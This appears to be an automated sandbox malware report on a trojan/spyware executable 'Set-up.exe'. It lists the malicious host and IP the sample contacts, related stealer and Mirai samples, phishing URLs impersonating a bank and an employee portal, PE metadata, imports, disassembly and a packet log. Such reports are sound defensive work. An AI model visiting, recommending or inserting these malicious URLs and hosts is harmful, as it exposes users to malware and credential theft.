http://home.eleventh11vs.top/MTL	Set-up.exe, 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/http-cookies.html	Set-up.exe	false		high
https://curl.se/docs/hsts.html#	Set-up.exe	false		high
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuX847	Set-up.exe	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe	false		high
http://.css	Set-up.exe	false		high
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847963	Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	Set-up.exe	false		high
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847http://home.eleventh11vs.top/MTL	Set-up.exe, 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847fd4	Set-up.exe, 00000000.00000003.1769940616.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1770044948.000000000126A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769708003.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769731422.0000000001265000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1771553083.000000000126B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.87.58.155	home.eleventh11vs.top	Russian Federation		2118	RELCOM-ASRelcomGroup19022019RU	true
34.197.122.172	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582491
Start date and time:	2024-12-30 18:11:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal60.troj.spyw.evad.winEXE@1/0@9/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 78% Number of executed functions: 49 Number of non-executed functions: 147
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 52.149.20.212
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	Set-up.exe	Get hash	malicious	Unknown	Browse	52.73.63.247
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELCOM-ASRelcomGroup19022019RU	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	194.87.58.92
	arm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	mips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	ppc.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
AMAZON-AESUS	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	securedoc_20241220T111852.html	Get hash	malicious	Unknown	Browse	44.219.110.92
	https://visa-pwr.com/	Get hash	malicious	Unknown	Browse	3.208.228.173
	botx.mips.elf	Get hash	malicious	Mirai	Browse	52.0.196.218
	botx.x86.elf	Get hash	malicious	Mirai	Browse	34.206.198.108
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	54.87.199.101
	botx.ppc.elf	Get hash	malicious	Mirai	Browse	54.56.4.115
	botx.arm7.elf	Get hash	malicious	Mirai	Browse	54.89.155.219
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	54.42.166.207

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.456874724928812
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	6'759'048 bytes
MD5:	f54b04dcddb77fdc57b307e8ec7daea1
SHA1:	16a21d6803565b513ade671ec344867bbe5ba97e
SHA256:	e83c43a49d2ab2c53f73acef9ccf4c2dca23c2c4d149108724b2d7a9dbbd2f14
SHA512:	f3ac35585174247a9f06831fcea12e163d421baec154f993dfb7431eb37ecac755723bc156886e23ff948ae9832241f605f430d9a76e179eb886a95251310ce1
SSDEEP:	49152:ASv0XbOiCuFJ6FGyMBjifMcUchTo+ia4S+i9OnlxtdWUhri8g5uKVbYGPyz8E9+y:ASWYuFBymjiScNoPNXiqlPkuKdyz8S
TLSH:	F5663B55EE8791F9DA8305715016B33F6E30AF009839CEB6CE94FB34C6B2A11E91E61D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.rg...............(..I...g..2............I...@...........................g.......h...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x67728058 [Mon Dec 30 11:13:28 2024 UTC]
TLS Callbacks:	0x7890e0, 0x789090
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	51b39aff649af7abc30a06f2362db069

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	26/08/2024 17:01:06 21/08/2025 17:01:06
Subject Chain	CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
Version:	3
Thumbprint MD5:	F617A6F3082EEC96B023751EF0945390
Thumbprint SHA-1:	A41C84671DD36CC27BE4B30EDF1281ACFB2B7EE3
Thumbprint SHA-256:	313D6596531456D10E79F77160793C03712B1157BFBCD32A25896C4F70AD8A0E
Serial:	33009F7B734DB0480411EB0BBA0000009F7B73

Entrypoint Preview

Instruction
mov dword ptr [00A3F658h], 00000001h
jmp 00007FE7CC858606h
nop
mov dword ptr [00A3F658h], 00000000h
jmp 00007FE7CC8585F6h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FE7CCBDFE66h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 008E6000h
call dword ptr [00A419A8h]
sub esp, 04h
test eax, eax
je 00007FE7CC8589C5h
mov ebx, eax
mov dword ptr [esp], 008E6000h
call dword ptr [00A41A1Ch]
mov edi, dword ptr [00A419BCh]
sub esp, 04h
mov dword ptr [00A3D028h], eax
mov dword ptr [esp+04h], 008E6013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 008E6029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [0089B004h], eax
test esi, esi
je 00007FE7CC858963h
mov dword ptr [esp+04h], 00A3D02Ch
mov dword ptr [esp], 00A38104h
call esi
mov dword ptr [esp], 00401580h
call 00007FE7CC8588B3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x641000	0x2dac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x671c00	0x688	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x646000	0x3418c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x62dd80	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x641814	0x620	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4997bc	0x499800	c3ba20095f0147867c77d5e85be8729f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x49b000	0x4a024	0x4a200	16985c2fec27f2b7d6de9e4643b5a41e	False	0.07566136172006746	dBase III DBT, version number 0, next free block index 10, 1st item "\360\315y"	1.0025453738829009	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x4e6000	0x151bb8	0x151c00	d79f9c42170b8e3379d9dd3789e4112d	False	0.42098951586787564	data	6.278534667841207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x638000	0x4d64	0x4e00	0da6b4bfc58d4fd4901066a1fc4ecc9a	False	0.3194110576923077	data	4.922516941847443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x63d000	0x3180	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x641000	0x2dac	0x2e00	2cdb7727c2a1da697f61163567e992b9	False	0.3688858695652174	data	5.435881261044204	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x644000	0x30	0x200	fe2a65d4187b984679c52ae93485940e	False	0.0625	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x645000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x646000	0x3418c	0x34200	24e9d0d0948bcf7e3b142592aa194977	False	0.4977939523381295	data	6.664300646722827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll	BCryptGenRandom
CRYPT32.dll	CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll	GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL	ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll	AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll	__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll	atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	setlocale
api-ms-win-crt-math-l1-1-0.dll	_fdopen
api-ms-win-crt-private-l1-1-0.dll	memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll	_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll	_byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll	CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll	WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 18:11:56.787899017 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:56.787925959 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:56.787998915 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:56.790901899 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:56.790916920 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:57.462285042 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:57.462937117 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:57.462954998 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:57.464148998 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:57.464215994 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:57.465452909 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:57.465519905 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:57.473123074 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:57.473130941 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:57.519103050 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:58.535973072 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:58.536058903 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:11:58.536111116 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:58.542640924 CET	49730	443	192.168.2.4	34.197.122.172
Dec 30, 2024 18:11:58.542660952 CET	443	49730	34.197.122.172	192.168.2.4
Dec 30, 2024 18:12:00.289334059 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.294213057 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.294291973 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.295105934 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.299964905 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.299974918 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.299993038 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.300002098 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.300017118 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.300025940 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.300040960 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.300126076 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.300146103 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.300154924 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.300170898 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.300220966 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.304524899 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.304600000 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.304928064 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.304938078 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.304944992 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.305003881 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.305056095 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.305066109 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.305071115 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.305133104 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.350888014 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.351046085 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.398860931 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.399055004 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.446897030 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.447066069 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.494899988 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.496628046 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.546884060 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.546950102 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.594866991 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.594940901 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.642826080 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.643016100 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.690881968 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.691049099 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.736315966 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.736622095 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741518021 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741538048 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741583109 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741614103 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741624117 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741633892 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741650105 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741658926 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741668940 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741688013 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741719961 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741722107 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741765976 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741775036 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741781950 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741817951 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741827965 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741835117 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741878033 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741878033 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741921902 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741928101 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.741930962 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.741986036 CET	49731	80	192.168.2.4	194.87.58.155
Dec 30, 2024 18:12:00.742034912 CET	80	49731	194.87.58.155	192.168.2.4
Dec 30, 2024 18:12:00.742105961 CET	80	49731	194.87.58.155	192.168.2.4
